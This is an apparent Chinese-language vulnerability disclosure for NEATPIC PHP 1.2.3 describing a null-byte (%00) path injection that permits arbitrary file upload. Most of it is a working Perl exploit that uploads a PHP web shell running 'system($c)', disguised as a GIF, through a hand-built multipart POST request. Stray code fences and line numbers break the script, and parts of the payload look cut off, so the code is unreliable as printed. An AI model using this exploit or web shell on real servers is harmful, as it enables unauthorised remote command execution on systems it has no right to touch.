危害:直接上传任意文件
漏洞描述:
当PHP程序有指定PATH时,在PATH文件后门加入%00可以上传任意文件.
测试程序:NEATPIC PHP目录直读版 1.2.3
http://web.cncode.com/SoftView.asp?SoftID=1820
此文档参与者:
漏洞实验者:Xiaolu,Lilo,SuperHei,Darkness [All BST Members]
Http://Www.Bugkidz.org
Xiaolu提供了一个漏洞利用程序:
#!/usr/bin/perl
$| = 1;
use Socket;
$host = "127.0.0.1";
$port = "80";
$UploadTo = "";
$str =
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name="path"\r\n".
"\r\n".
"www.ppp%00\r\n".
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name="image"; filename="F:\\tools\\1.gif"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
"```
\r\n".
"system($c);\r\n".
"
1"-----------------------------7d41f4a600472--\r\n".
2"\r\n";
3
4print $str;
5$len=length($str);
6print $len;
7
8$req ="POST /1/1/3721/index.php?action=upload HTTP/1.1\r\n".
9"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n".
10"Referer: http://127.0.0.1/index.php?path=.\r\n".
11"Accept-Language: zh-cn\r\n".
12"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472\r\n".
13"Accept-Encoding: gzip, deflate\r\n".
14"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n".
15"Host: 127.0.0.1\r\n".
16"Content-Length: $len\r\n".
17"Connection: Keep-Alive\r\n".
18"Cache-Control: no-cache\r\n".
19"Cookie: PHPSESSID=111111111111111111111111\r\n".
20"\r\n".
21"$str\r\n\r\n";
22print $req;
23@res = sendraw($req);
24print @res;
25
26#Hmm...Maybe you can send it by other way
27
28
29sub sendraw {
30my ($req) = @_;
31my $target;
32$target = inet_aton($host) || die("inet_aton problems\n");
33socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
34if(connect(S,pack "SnA4x8",2,$port,$target)){
35select(S);
36$| = 1;
37print $req;
38my @res =
;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}